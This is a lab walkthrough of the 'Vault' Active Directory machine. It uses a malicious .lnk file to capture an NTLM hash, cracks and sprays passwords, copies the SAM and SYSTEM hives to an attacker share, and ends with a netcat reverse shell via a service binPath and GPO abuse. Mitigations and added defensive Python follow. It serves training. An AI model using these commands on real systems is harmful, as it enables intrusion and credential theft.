Vault

Introduction

In this walkthrough, I explored Vault, a hard-rated Active Directory machine. During enumeration, I discovered a writable SMB share. By placing a malicious .lnk (shortcut) file on the share, I was able to capture an NTLM hash for a local user. After cracking the hash and connecting via evil-winrm, I obtained an initial shell.

Post-exploitation, I identified two distinct privilege escalation paths:

  1. GPO Abuse – My user had GenericWrite rights over the Default Domain Policy, which allowed me to inject a malicious startup script and gain full control.
  2. SeRestorePrivilege Abuse – I also demonstrated privilege escalation by abusing this powerful right, typically reserved for backup operations.

Nmap

TCP

Run a quick Nmap TCP scan:

sudo nmap -sV $IP --open

UDP

Check top 100 UDP ports:

sudo nmap -sU -F $IP

Full Port Scan

sudo nmap -sV -sC -p- $IP -Pn -n -v --open

Services

Port 53

Domain: vault.offsec

  • dig any DNS records

    dig any vault.offsec @$IP

  • Zone Transfer

    dig axfr @$IP vault.offsec

Port 139/445 (SMB)

  • smbclient

    smbclient -L //$IP/ -N

    • DocumentsShare

      We can access the share; it is empty, but we have write access to it.

  • nxc

    sudo nxc smb $IP -u 'guest' -p '' --shares

Port 135 (MSRPC)

rpcclient -U'%' $IP

NT_STATUS_ACCESS_DENIED

Port 3389 (RDP)

Nothing to do for now.

Port 5985 (WinRM)

Web

AD Initial Enumeration

User Enumeration

Unauthenticated

impacket-lookupsid 'vault.offsec/guest'@vault.offsec -no-pass | grep SidTypeUser | cut -d' ' -f 2 | cut -d'\' -f 2 | tee users

Port 389/3268

ldapsearch -x -H ldap://$IP -D '' -w '' -b "DC=vault,DC=offsec"

LDAP Anonymous Bind is not enabled.

Initial Attack Vectors

AS-REP Roasting

GetNPUsers.py vault.offsec/ -dc-ip $IP -no-pass -usersfile users

Password Spraying

sudo nxc smb $IP -u users -p users --continue-on-success

RDP Brute-Forcing

hydra -t 1 -l anirudh -P users rdp://$IP

Exploitation

I am going to put a .lnk file on the share and wait for a connection.

Use this tool to create the .lnk file:

Then run Responder:

sudo responder -I tun0

Now let’s crack the user’s hash.

hashcat -m 5600 anirudh.hash /usr/share/wordlists/rockyou.txt

Now let’s check if the password was reused:

sudo nxc smb $IP -u users -p SecureHM --continue-on-success

Check shares again:

sudo nxc smb $IP -u anirudh -p SecureHM --shares

Checking WinRM access:

sudo nxc winrm $IP -u anirudh -p SecureHM

Shell as anirudh

1st way (SeBackupPrivilege & SeRestorePrivilege)

Checking privileges, I see that our user has many of them.

Let’s use SeBackupPrivilege.

I first tried copying ntds.dit, but it returned the following error:

diskshadow.exe /s back_script.txt

Contents of back_script.txt:

set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup

When creating back_script.txt on Linux, convert it to CRLF line endings before transferring it:

unix2dos back_script.txt

It doesn’t work for some reason, so let’s save the SAM and SYSTEM hives instead:

reg save HKLM\SYSTEM SYSTEM.SAV
reg save HKLM\SAM SAM.SAV

File transfer:

sudo impacket-smbserver share -smb2support .

copy SAM.SAV \\192.168.45.159\share\SAM.SAV
copy SYSTEM.SAV \\192.168.45.159\share\SYSTEM.SAV

secretsdump.py -sam SAM.SAV -system SYSTEM.SAV LOCAL

impacket-psexec Administrator@$IP -hashes :608339ddc8f434ac21945e026887dc36

Trying to access the target using the local admin hash doesn’t work.

Let’s abuse SeRestorePrivilege.

If we have SeRestorePrivilege, we are most probably in the Server Operators group, which in turn most probably means we have SERVICE_ALL_ACCESS over services running as Local System. You can first run .\winPEASany.exe quiet servicesinfo to identify such services, then change their binPath to add our user to the local Administrators group or, better, give us a shell.

We are in the Server Operators group.

I am going to check my permissions over a service running as Local System.

sc.exe sdshow "AppReadiness"

sudo python3 /opt/winsddl/sd.py --type=service "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)"

As you can see we have SERVICE_START, SERVICE_STOP, SERVICE_CHANGE_CONFIG.
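The SDDL string above can be decoded without an external script. The following Python is an added example, not code from the original post or from the winsddl tool: it parses a service DACL, expands each ACE's rights into their service-specific names, and lists every principal other than SYSTEM and Administrators that holds a right allowing the service to be reconfigured or taken over, which is the check a defender would run across every service on a host. The right and trustee tables are assumptions taken from the documented service access rights and well-known SID aliases; the sample input is the SDDL shown above.

```python
import re

# Service-specific access rights: SDDL two-letter token -> (mask bit, name).
# Assumed mapping built from the documented service access right values.
RIGHTS = {
    "CC": (0x00000001, "SERVICE_QUERY_CONFIG"),
    "DC": (0x00000002, "SERVICE_CHANGE_CONFIG"),
    "LC": (0x00000004, "SERVICE_QUERY_STATUS"),
    "SW": (0x00000008, "SERVICE_ENUMERATE_DEPENDENTS"),
    "RP": (0x00000010, "SERVICE_START"),
    "WP": (0x00000020, "SERVICE_STOP"),
    "DT": (0x00000040, "SERVICE_PAUSE_CONTINUE"),
    "LO": (0x00000080, "SERVICE_INTERROGATE"),
    "CR": (0x00000100, "SERVICE_USER_DEFINED_CONTROL"),
    "SD": (0x00010000, "DELETE"),
    "RC": (0x00020000, "READ_CONTROL"),
    "WD": (0x00040000, "WRITE_DAC"),
    "WO": (0x00080000, "WRITE_OWNER"),
    "GA": (0x10000000, "GENERIC_ALL"),
    "GX": (0x20000000, "GENERIC_EXECUTE"),
    "GW": (0x40000000, "GENERIC_WRITE"),
    "GR": (0x80000000, "GENERIC_READ"),
}
BIT_TO_NAME = {bit: name for bit, name in RIGHTS.values()}

# Well-known SID aliases that appear in service SDDL (assumed subset).
TRUSTEES = {
    "SY": "NT AUTHORITY\\SYSTEM",
    "BA": "BUILTIN\\Administrators",
    "SO": "BUILTIN\\Server Operators",
    "IU": "NT AUTHORITY\\INTERACTIVE",
    "SU": "NT AUTHORITY\\SERVICE",
    "AU": "NT AUTHORITY\\Authenticated Users",
    "BU": "BUILTIN\\Users",
    "WD": "Everyone",
}

# Rights that let a principal repoint, reconfigure or take ownership of a service.
CONTROL_RIGHTS = {"SERVICE_CHANGE_CONFIG", "WRITE_DAC", "WRITE_OWNER",
                  "GENERIC_ALL", "GENERIC_WRITE"}
# Principals expected to hold those rights on any service.
TRUSTED = {"SY", "BA"}

# The descriptor returned by `sc.exe sdshow "AppReadiness"` above.
PAGE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
             "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)")


def decode_rights(token):
    """Turn an ACE rights field into a sorted list of right names.
    Accepts the two-letter form (CCDCLC...) and the hex form (0x1F01FF)."""
    if token.lower().startswith("0x"):
        mask = int(token, 16)
        return sorted(name for bit, name in BIT_TO_NAME.items() if mask & bit)
    if len(token) % 2:
        raise ValueError(f"malformed rights token: {token!r}")
    names = []
    for i in range(0, len(token), 2):
        pair = token[i:i + 2]
        if pair not in RIGHTS:
            raise ValueError(f"unknown right {pair!r}")
        names.append(RIGHTS[pair][1])
    return sorted(names)


def parse_dacl(sddl):
    """Return the DACL of a service SDDL string as a list of ACE dicts."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    if not m:
        raise ValueError("no DACL (D:) section found")
    aces = []
    for body in re.findall(r"\(([^)]*)\)", m.group(1)):
        fields = body.split(";")
        if len(fields) != 6:
            raise ValueError(f"malformed ACE: ({body})")
        ace_type, flags, rights, _obj_guid, _inherit_guid, sid = fields
        aces.append({
            "type": ace_type,            # A = access allowed, D = access denied
            "flags": flags,
            "rights": decode_rights(rights),
            "sid": sid,
            "trustee": TRUSTEES.get(sid, sid),
        })
    return aces


def find_control_grants(sddl):
    """List (trustee, rights) for allow ACEs that give service-control rights
    to a principal other than SYSTEM or Administrators."""
    hits = []
    for ace in parse_dacl(sddl):
        if ace["type"] != "A" or ace["sid"] in TRUSTED:
            continue
        risky = sorted(set(ace["rights"]) & CONTROL_RIGHTS)
        if risky:
            hits.append((ace["trustee"], risky))
    return hits


if __name__ == "__main__":
    for ace in parse_dacl(PAGE_SDDL):
        print(f"{ace['trustee']:<32} {', '.join(ace['rights'])}")
    print("control rights outside SYSTEM/Administrators:", find_control_grants(PAGE_SDDL))
```

Run over the AppReadiness descriptor, the only finding is Server Operators holding SERVICE_CHANGE_CONFIG, WRITE_DAC and WRITE_OWNER, which is exactly the condition the escalation above relies on; looping the same check over the output of `sc.exe sdshow` for every service turns it into an audit.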

I am going to upload nc64.exe and configure the service to run a reverse shell with it:

sc.exe config AppReadiness binPath= "cmd /c C:\tools\nc64.exe 192.168.45.159 4444 -e cmd.exe"

As you can see we changed the service config; now let’s trigger it by stopping and restarting the service.

2nd way (GPO Abuse)

Upload SharpHound.exe and run it, then download the zip file and open it in BloodHound.

.\SharpHound.exe -c All --zipfilename vault

We have GenericWrite over the Default Domain Policy, so we can use the SharpGPOAbuse tool to modify GPOs for privilege escalation. Let’s add our user to the Administrators group:

.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"

After that, run the GPO update command:

gpupdate /force

As you can see, we are now a local admin.

Now let’s use either evil-winrm or psexec to get a higher-privileged shell.

psexec.py vault.offsec/anirudh:SecureHM@$IP

Credentials

anirudh:SecureHM

Mitigation

  • Audit and limit write access to SMB shares to prevent file-based attacks like .lnk payloads.
  • Regularly review ACLs on GPOs to ensure only trusted users have GenericWrite or Modify permissions.
  • Avoid assigning SeRestorePrivilege to standard users; restrict it to trusted backup accounts.
  • Enable SMB signing and NTLM relay protections to prevent hash capturing and reuse.
  • Monitor for suspicious .lnk file creations and policy modifications using event logging and SIEM tools.
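For the last bullet, the following Python is an added example (not from the original post) of what that monitoring could look like: two detection checks run over constructed sample events modelled on Sysmon Event ID 11 (FileCreate) and Security Event ID 5136 (directory service object modified), flagging a .lnk dropped on a share by a non-shell process and a GPO change by an account outside the expected editor set. The share roots, the GPO editor allowlist and the sample event values are assumptions made for this example.

```python
import ntpath

# Constructed sample events for this example. Field names follow the Sysmon
# Event ID 11 and Security Event ID 5136 schemas; the values are made up.
SAMPLE_EVENTS = [
    {"EventID": 11, "User": "VAULT\\alice", "Image": "C:\\Windows\\explorer.exe",
     "TargetFilename": "C:\\Users\\alice\\Desktop\\Report.lnk"},
    {"EventID": 11, "User": "VAULT\\guest", "Image": "C:\\Windows\\System32\\cmd.exe",
     "TargetFilename": "C:\\DocumentsShare\\@Invoice.lnk"},
    {"EventID": 11, "User": "VAULT\\bob", "Image": "C:\\Windows\\explorer.exe",
     "TargetFilename": "C:\\DocumentsShare\\budget.xlsx"},
    {"EventID": 5136, "SubjectUserName": "gpo-admin", "ObjectClass": "groupPolicyContainer",
     "AttributeLDAPDisplayName": "versionNumber",
     "ObjectDN": "CN={GPO-GUID-PLACEHOLDER},CN=Policies,CN=System,DC=vault,DC=offsec"},
    {"EventID": 5136, "SubjectUserName": "anirudh", "ObjectClass": "groupPolicyContainer",
     "AttributeLDAPDisplayName": "gPCMachineExtensionNames",
     "ObjectDN": "CN={GPO-GUID-PLACEHOLDER},CN=Policies,CN=System,DC=vault,DC=offsec"},
]

# Local paths backing writable SMB shares (assumed; take these from the share config).
MONITORED_SHARE_ROOTS = ["C:\\DocumentsShare\\"]
# Accounts expected to edit GPOs (assumed allowlist).
GPO_EDITORS = {"gpo-admin"}
# Processes that create .lnk files as part of normal desktop use.
BENIGN_LNK_CREATORS = {"explorer.exe"}


def check_lnk_create(event):
    """Flag a .lnk created under a monitored share root. Severity is raised when
    the creating process is not the desktop shell, since shortcuts written to a
    share by cmd, PowerShell or a scripting host are rarely legitimate."""
    path = event.get("TargetFilename", "")
    if not path.lower().endswith(".lnk"):
        return None
    if not any(path.lower().startswith(root.lower()) for root in MONITORED_SHARE_ROOTS):
        return None
    image = ntpath.basename(event.get("Image", "")).lower()
    severity = "medium" if image in BENIGN_LNK_CREATORS else "high"
    return {"rule": "lnk_created_on_share", "severity": severity,
            "user": event.get("User"), "path": path, "image": image}


def check_gpo_modify(event):
    """Flag a GPO object modification made by an account outside the editor set."""
    if event.get("ObjectClass") != "groupPolicyContainer":
        return None
    actor = event.get("SubjectUserName", "")
    if actor in GPO_EDITORS:
        return None
    return {"rule": "gpo_modified_by_unexpected_account", "severity": "high",
            "user": actor, "attribute": event.get("AttributeLDAPDisplayName"),
            "object": event.get("ObjectDN")}


CHECKS = {11: check_lnk_create, 5136: check_gpo_modify}


def run_detections(events):
    """Apply the check matching each event's ID and return the alerts produced."""
    alerts = []
    for ev in events:
        check = CHECKS.get(ev.get("EventID"))
        if check is None:
            continue
        alert = check(ev)
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for alert in run_detections(SAMPLE_EVENTS):
        print(alert)
```

On the sample set only two events alert: the .lnk written to the share by cmd.exe as guest, and the GPO attribute change made by anirudh; the shortcut on a user's own desktop and the GPO edit by the allowlisted admin are left alone, which is the noise trade-off these two rules are tuned for.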

This post is licensed under CC BY 4.0 by the author.